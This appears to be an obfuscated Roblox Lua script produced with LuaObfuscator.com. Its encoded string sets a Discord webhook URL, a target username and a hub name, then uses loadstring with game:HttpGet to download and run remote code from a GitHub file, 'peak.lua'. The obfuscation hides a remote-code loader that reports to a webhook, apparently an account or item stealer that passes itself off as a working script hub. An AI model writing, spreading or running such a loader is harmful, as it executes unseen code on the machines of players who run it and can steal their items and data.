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\_Welcome to LuaObfuscator.com (Alpha 0.2.5) ~ Much Love, Ferib
do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v71=0;while true do if (0==v71) then v19=v0(v3(v30,1,1));return "";end end else local v72=v2(v0(v30,16));if v19 then local v78=v5(v72,v19);v19=nil;return v78;else return v72;end end end);local function v20(v31,v32,v33)if v33 then local v73=(v31/((4 -2)^(v32-1)))%((2 + 0 + 0)^(((v33-(1 + 0)) -(v32-(1 -0))) + 1 + 0)) ;return v73-(v73%((1 -0) + 0)) ;else local v74=2^(v32-(923 -(119 + 307 + 496))) ;return (((v31%(v74 + v74))>=v74) and (1193 -(243 + 949))) or (770 -(569 + 201)) ;end end local function v21()local v38=0 + 0 ;local v39;while true do if (v38==1) then return v39;end if (v38==((0 -0) + 0)) then v39=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v38=1 -0 ;end end end local function v22()local v40=0;local v41;local v42;while true do if (v40==(0 -(1061 -(839 + 222)))) then v41,v42=v1(v16,v18,v18 + (2 -0) );v18=v18 + (5 -3) ;v40=1 -0 ;end if (v40==1) then return (v42 * (686 -(90 + 340))) + v41 ;end end end local function v23()local v43=0 + 0 ;local v44;local v45;local v46;local v47;while true do if ((0 -0)==v43) then v44,v45,v46,v47=v1(v16,v18,v18 + 3 );v18=v18 + 4 + 0 ;v43=2 -1 ;end if (v43==(1 + 0)) then return (v47 * 16777216) + (v46 * ((15953 + 50435) -(767 + 85))) + (v45 * ((6778 -4827) -(468 + (2166 -(542 + 397))))) + v44 ;end end end local function v24()local v48=0 + 0 ;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(0 + 0)) then v49=v23();v50=v23();v48=3 -(1 + 1) ;end if (v48==2) then v53=v20(v50,654 -(287 + 346) ,1730 -(574 + 1125) );v54=((v20(v50,84 -52 )==(1 + 0)) and -(4 -3)) or (1849 -(1624 + 224)) ;v48=7 -4 ;end if (v48==(1084 -(223 + 858))) then if (v53==((0 -0) -0)) then if (v52==(0 + 0)) then return v54 * 0 ;else local v90=0 + 0 ;while true do if (v90==(0 -0)) then v53=1466 -(1192 + 273) ;v51=0 + 0 ;break;end end end elseif (v53==2047) then return ((v52==(0 + 0)) and (v54 * ((1 + (257 -(92 + 165)))/(0 -0)))) or (v54 * NaN) ;end return v8(v54,v53-1023 ) * (v51 + (v52/((232 -(145 + 22 + 63))^(157 -105)))) ;end if (v48==(1 + 0)) then v51=2 -1 ;v52=(v20(v50,1 -0 ,(1509 -(1434 + 73)) + 18 ) * ((667 -(101 + 564))^(59 -27))) + v49 ;v48=2;end end end local function v25(v34)local v55=0 + 0 ;local v56;local v57;while true do if (v55==(2 + 1)) then return v6(v57);end if (1==v55) then v56=v3(v16,v18,(v18 + v34) -(1 + 0) );v18=v18 + v34 ;v55=5 -3 ;end if ((274 -(210 + 64))==v55) then v56=nil;if not v34 then local v81=0;while true do if (v81==((6341 -4352) -(1087 + 902))) then v34=v23();if (v34==(0 + 0 + 0)) then return "";end break;end end end v55=1 + 0 ;end if (v55==((3797 -(988 + 985)) -(843 + 608 + 371))) then v57={};for v79=1 -0 , #v56 do v57[v79]=v2(v1(v3(v56,v79,v79)));end v55=3 + 0 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v58=0 -0 ;local v59;local v60;local v61;local v62;local v63;local v64;local v65;local v66;while true do if (v58==4) then while true do if (v59==3) then v66=nil;while true do local v91=0 -0 ;while true do if (v91==(1 -0)) then if (v60==(2 + 0)) then local v107=0;while true do if (v107~=0) then else local v114=0 + 0 ;while true do if ((0 + 0)~=v114) then else for v127=2 -1 ,v65 do local v128=936 -(564 + 372) ;local v129;local v130;local v131;while true do if (v128==(1 + 0)) then v131=nil;while true do if ((2 -1)==v129) then if (v130==(580 -(524 + 55))) then v131=v21()~=(0 -0) ;elseif (v130==(5 -3)) then v131=v24();elseif (v130~=(8 -5)) then else v131=v25();end v66[v127]=v131;break;end if (v129==(0 + 0)) then local v142=233 -(38 + 195) ;while true do if (v142==(1 + 0)) then v129=1291 -(996 + 294) ;break;end if (v142==(1589 -(192 + 1397))) then v130=v21();v131=nil;v142=3 -2 ;end end end end break;end if (v128~=(563 -(20 + 543))) then else v129=1465 -(134 + 1331) ;v130=nil;v128=1 + 0 ;end end end v64[1 + 2 ]=v21();v114=1 -0 ;end if (v114==(3 -2)) then v107=2 -1 ;break;end end end if ((363 -(344 + 18))==v107) then for v115=1063 -(174 + 888) ,v23() do local v116=0;local v117;local v118;local v119;while true do if ((1 + 0)~=v116) then else v119=nil;while true do if (v117~=(933 -(909 + 24))) then else local v132=1678 -(387 + 1291) ;while true do if (v132~=(505 -(246 + 259))) then else v118=0 + 0 ;v119=nil;v132=1;end if ((78 -(41 + 36))==v132) then v117=2 -1 ;break;end end end if (v117~=1) then else while true do if (0==v118) then v119=v21();if (v20(v119,140 -(64 + 75) ,909 -(186 + 722) )~=(0 -0)) then else local v162=620 -(244 + 376) ;local v163;local v164;local v165;local v166;while true do if (v162==(1 + 0)) then v165=nil;v166=nil;v162=7 -5 ;end if (v162~=(0 -0)) then else v163=0 -0 ;v164=nil;v162=2 -1 ;end if (v162==(1 + 1)) then while true do if (v163~=(0 + 0)) then else v164=v20(v119,1 + 1 ,2 + 1 );v165=v20(v119,226 -(98 + 124) ,732 -(161 + 565) );v163=1221 -(316 + 904) ;end if (v163==(1521 -(458 + 1061))) then local v177=0 -0 ;while true do if (1~=v177) then else v163=929 -(310 + 616) ;break;end if (v177~=(0 -0)) then else if (v20(v165,1,204 -(16 + 187) )==(1 + 0)) then v166[2]=v66[v166[6 -4 ]];end if (v20(v165,1969 -(610 + 1357) ,2 + 0 )==(1 + 0)) then v166[795 -(667 + 125) ]=v66[v166[3]];end v177=1 + 0 ;end end end if (v163~=(225 -(49 + 173))) then else if (v20(v165,3 + 0 ,8 -5 )==1) then v166[14 -10 ]=v66[v166[11 -7 ]];end v61[v115]=v166;break;end if ((1 -0)==v163) then local v179=1327 -(525 + 802) ;while true do if (0==v179) then local v187=0 -0 ;while true do if (v187==(4 -3)) then v179=1 + 0 ;break;end if (v187~=0) then else v166={v22(),v22(),nil,nil};if (v164==0) then local v193=1490 -(1179 + 311) ;local v194;local v195;while true do if (v193==(1460 -(579 + 881))) then v194=0 + 0 ;v195=nil;v193=777 -(300 + 476) ;end if ((3 -2)==v193) then while true do if (0==v194) then v195=0 + 0 ;while true do if (v195==(0 + 0)) then v166[9 -6 ]=v22();v166[1774 -(1741 + 29) ]=v22();break;end end break;end end break;end end elseif (v164==1) then v166[8 -5 ]=v23();elseif (v164==(2 + 0)) then v166[2 + 1 ]=v23() -(2^(24 -8)) ;elseif (v164==(11 -8)) then local v200=0 -0 ;while true do if ((0 -0)~=v200) then else v166[3]=v23() -((1 + 1)^16) ;v166[14 -10 ]=v22();break;end end end v187=578 -(337 + 240) ;end end end if (v179==(2 -1)) then v163=3 -1 ;break;end end end end break;end end end break;end end break;end end break;end if (v116~=0) then else v117=1919 -(1281 + 638) ;v118=nil;v116=1163 -(846 + 316) ;end end end v60=3;break;end end end if (v60==(1246 -(1100 + 145))) then v64={v61,v62,nil,v63};v65=v23();v66={};v60=2;end break;end if (v91~=(485 -(383 + 102))) then else if (v60==3) then local v108=0 + 0 ;while true do if (v108~=0) then else for v120=58 -(21 + 36) ,v23() do v62[v120-(1 + 0) ]=v28();end for v122=2 -1 ,v23() do v63[v122]=v23();end v108=1 -0 ;end if ((3 -2)~=v108) then else return v64;end end end if (v60==(671 -(172 + 499))) then local v109=1380 -(551 + 829) ;while true do if ((191 -(155 + 35))==v109) then v63={};v60=725 -(556 + 168) ;break;end if (v109==(0 -0)) then v61={};v62={};v109=1801 -(1192 + 608) ;end end end v91=1 + 0 ;end end end break;end if (v59==(0 -0)) then local v88=0;while true do if (v88==0) then v60=0 -0 ;v61=nil;v88=1 -0 ;end if (v88~=1) then else v59=1 -0 ;break;end end end if (1==v59) then v62=nil;v63=nil;v59=823 -(788 + 33) ;end if (v59~=2) then else local v89=0 -0 ;while true do if (v89~=(0 + 0)) then else v64=nil;v65=nil;v89=2 -1 ;end if (v89~=(2 -1)) then else v59=1890 -(1802 + 85) ;break;end end end end break;end if (v58==1) then v61=nil;v62=nil;v58=2;end if (v58==(0 + 0)) then v59=26 -(16 + 10) ;v60=nil;v58=724 -(169 + 554) ;end if (v58==(607 -(176 + 428))) then v65=nil;v66=nil;v58=17 -13 ;end if (v58==(79 -(43 + 34))) then v63=nil;v64=nil;v58=3 + 0 ;end end end local function v29(v35,v36,v37)local v67=0;local v68;local v69;local v70;while true do if (v67==0) then v68=v35[1];v69=v35[2];v67=1;end if (v67==1) then v70=v35[3];return function(...)local v82=0;local v83;local v84;local v85;local v86;local v87;while true do if (v82==1) then v85={...};v86=v12("#",...) -1 ;v82=2;end if (v82==0) then v83=1;v84= -1;v82=1;end if (2==v82) then v87=nil;function v87()local v92=v68;local v93=v69;local v94=v70;local v95=v27;local v96={};local v97={};local v98={};for v104=0 -0 ,v86 do if (((1661 + 1267)<3938) and (v104>=v94)) then v96[v104-v94 ]=v85[v104 + 1 ];else v98[v104]=v85[v104 + 1 + 0 ];end end local v99=(v86-v94) + (574 -(489 + 84)) ;local v100;local v101;while true do local v105=0;local v106;while true do if ((v105==0) or ((811 + 1513)<(411 + 972))) then v106=0;while true do if ((v106==(124 -((89 -21) + 55))) or ((10547 -5980)<(4902 -3602))) then if (((2942 -(11 + 127))==2804) and (v101<=4)) then if (((2808 -851)>998) and (v101<=(1 + 0))) then if ((v101==(1192 -((1579 -954) + 567))) or ((4781 -(504 + 677))<=(2570 -(83 + 539)))) then v83=v100[(9 -4) -2 ];else v98[v100[5 -3 ]][v100[455 -(216 + 236) ]]=v100[2 + 2 ];end elseif (((2027 -(42 + 108))<4307) and (v101<=(773 -(764 + 7)))) then local v136=1600 -(918 + 682) ;local v137;local v138;local v139;while true do if (((2824 -(736 + 1036))<(2280 + 1785)) and (v136==(0 -0))) then v137=1144 -(506 + 638) ;v138=nil;v136=2 -1 ;end if ((v136==((1 -0) -0)) or (3464<(7000 -3772))) then v139=nil;while true do if ((v137==((0 -0) -0)) or (4610<(8342 -5405))) then local v168=1104 -(755 + 349) ;while true do if ((4135>(5127 -(1278 + 130))) and (v168==(1 + 0))) then v137=1 -0 ;break;end if ((((1427 + 687) -(202 + 120))==(2322 -(116 + 414))) and (v168==((0 + 0) -0))) then v138=635 -(325 + 310) ;v139=nil;v168=3 -(2 + 0) ;end end end if (((2323 + 1085 + 1389)>=(434 + 311)) and ((1174 -(116 + 1057))==v137)) then while true do if ((v138==(0 -0)) or (3968<(737 + 2332))) then v139=v100[1399 -(479 + 918) ];v98[v139]=v98[v139](v13(v98,v139 + 1 ,v84));break;end end break;end end break;end end elseif ((v101>(14 -(10 + (4 -3)))) or (((638 + 47) -330)>=(3283 -((274 -67) + 340)))) then local v143=0 -0 ;local v144;local v145;local v146;local v147;while true do if (((1013 + (4813 -(320 + 1562)))==(6214 -2270)) and (v143==(0 -0))) then v144=0;v145=nil;v143=1 + (745 -(346 + 399)) ;end if ((v143==(2 -1)) or (2299>(3140 -(177 + 136)))) then v146=nil;v147=nil;v143=446 -(153 + (482 -191)) ;end if ((2==v143) or ((4354 -(122 + 1655))>(6330 -(911 + 1081)))) then while true do if ((v144==(3 -2)) or ((4347 -(102 + 306))<(4331 -2961))) then v147=nil;while true do if (((1344 + 845)<=(724 + 2815)) and (v145==(0 + 0))) then local v180=0 + 0 ;local v181;while true do if ((v180==(0 -0)) or ((4758 -2168)>4343)) then v181=0;while true do if (((10170 -5781)>=(7430 -3146)) and (v181==0)) then local v192=0 + 0 ;while true do if ((v192==((1513 -(890 + 623)) -0)) or ((2872 -(249 + 313))<=(1795 -(9 + 22 + (766 -(205 + 432)))))) then v146=v100[2];v147=v98[v100[11 -8 ]];v192=1 -0 ;end if ((v192==1) or ((814 + 1890)<=1985)) then v181=(1 + 0) -0 ;break;end end end if ((4963>=(4785 -(203 + 58))) and (v181==(1 + 0))) then v145=1492 -(332 + 571 + 588) ;break;end end break;end end end if ((v145==((4509 -3313) -(5 + 1190))) or ((1826 -(276 + 1417))==(2681 -(39 + 555)))) then v98[v146 + (2 -1) + 0 ]=v147;v98[v146]=v147[v100[(444 -(401 + 42)) + 3 ]];break;end end break;end if ((3651>((2166 + 93) -(768 + 520))) and (v144==(0 + 0))) then local v171=(1866 -(1616 + 250)) -0 ;while true do if ((890<=(3280 -(293 + 1706))) and (v171==1)) then v144=1 + 0 ;break;end if ((v171==(1522 -(136 + 1386))) or ((4215 -(971 + 501))>=(153 + 4002))) then v145=0;v146=nil;v171=(6 -4) -1 ;end end end end break;end end else v98[v100[495 -(295 + 198) ]]();end elseif ((v101<=(127 -(65 + 55))) or ((8579 -5615)<=(1068 -(480 + 356)))) then if (((11390 -7054)==(9152 -4816)) and (v101<=(436 -(25 + 406)))) then if ((v98[v100[(838 -(118 + 718)) -0 ]]==v100[11 -7 ]) or ((4178 -1519)<=660)) then v83=v83 + 1 + 0 ;else v83=v100[3];end elseif (((3344 -(599 + 940))==(2394 -(280 + 309))) and (v101==(145 -(65 + (1900 -(48 + 1778)))))) then v98[v100[40 -(21 + 17) ]]=v37[v100[802 -(326 + 473) ]];else for v158=v100[2],v100[1716 -(618 + 1095) ] do v98[v158]=nil;end end elseif ((v101<=8) or ((3212 -(522 + 64))>(4207 -1207))) then do return;end elseif (((2748 -(971 + 322))<=(7313 -4326)) and (v101==(6 + 3))) then v98[v100[2 -0 ]]=v100[1 + 0 + 2 ];else local v153=(3422 -(1637 + 322)) -((1095 -530) + 898) ;local v154;local v155;local v156;local v157;while true do if ((v153==(1 + 0)) or (1187>2728)) then v84=(v156 + v154) -(1 -0) ;v157=1509 -(1057 + 442 + 10) ;v153=1 + 1 + 0 ;end if ((v153==(0 -0)) or ((8430 -4026)<(5879 -3656))) then local v167=418 -((800 -514) + 132) ;while true do if (((4010 -2671)<=(1885 + 907)) and (((906 -(12 + 894)) + 0)==v167)) then v154=v100[(2 -1) + 1 ];v155,v156=v95(v98[v154](v13(v98,v154 + (3 -2) ,v100[1 + 2 ])));v167=860 -(567 + 292) ;end if ((v167==1) or ((522 + 1381)>=((9165 -(594 + 978)) -3905))) then v153=1 + 0 ;break;end end end if (((2 + 0)==v153) or ((3905 -1934)==(2373 + (4018 -(306 + 1194))))) then for v169=v154,v84 do local v170=0 -0 ;while true do if ((((13281 -8748) -(1180 + 712))<=3688) and ((0 -0)==v170)) then v157=v157 + (1074 -(605 + 468)) ;v98[v169]=v155[v157];break;end end end break;end end end v83=v83 + (2 -1) ;break;end if (((2178 -(1375 + 512))==(248 + 43)) and (((1958 -(941 + 1017)) + 0)==v106)) then local v124=0 -0 ;local v125;while true do if (((1761 -(1160 + (917 -(311 + 207))))==(541 -(171 + 168))) and (v124==(0 -0))) then v125=0 -0 ;while true do if ((v125==0) or ((5004 -(1258 + 302))<=((262 -133) + 657))) then local v140=0;while true do if ((v140==0) or ((711 + 195)>=(4713 -(1004 + 186)))) then v100=v92[v83];v101=v100[1237 -(1012 + 224) ];v140=4 -3 ;end if ((884<(4273 -(273 + 379))) and (v140==(1 + 0))) then v125=1;break;end end end if ((v125==((1 + 3) -3)) or ((5877 -(203 + 1430))==4361)) then v106=3 -2 ;break;end end break;end end end end break;end end end end v82=3;end if (v82==3) then A,B=v27(v11(v87));if not A[1] then local v102=0;local v103;while true do if (0==v102) then v103=v35[4][v83] or "?" ;error("Script error at [" .. v103 .. "]:" .. A[2] );break;end end else return v13(A,2,B);end break;end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F47030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O30353235303734303339312O373233362F682O626E7453697A4C4549577242494F3730774838486457464563336434385F514F574876442O694D544445537356597A677A4851494E7044736B2O6736306C4A305442030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C756103083O00557365726E616D65030A3O004D616E4171756174696303073O004875624E616D6503113O0053637269707420576F726B696E673O2E001C3O0012093O00014O0007000100013O0026053O00020001000100044O00020001001209000100013O002605000100110001000200044O00110001001206000200033O003001000200040005001206000200063O001206000300073O002004000300030008001209000500094O000A000300054O000200023O00022O000300020001000100044O001B0001002605000100050001000100044O00050001001206000200033O0030010002000A000B001206000200033O0030010002000C000D001209000100023O00044O0005000100044O001B000100044O000200012O00083O00017O001C3O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000D3O000D3O000E3O000E3O000F3O000F3O00103O00113O00133O00143O00163O00",v9(),...);end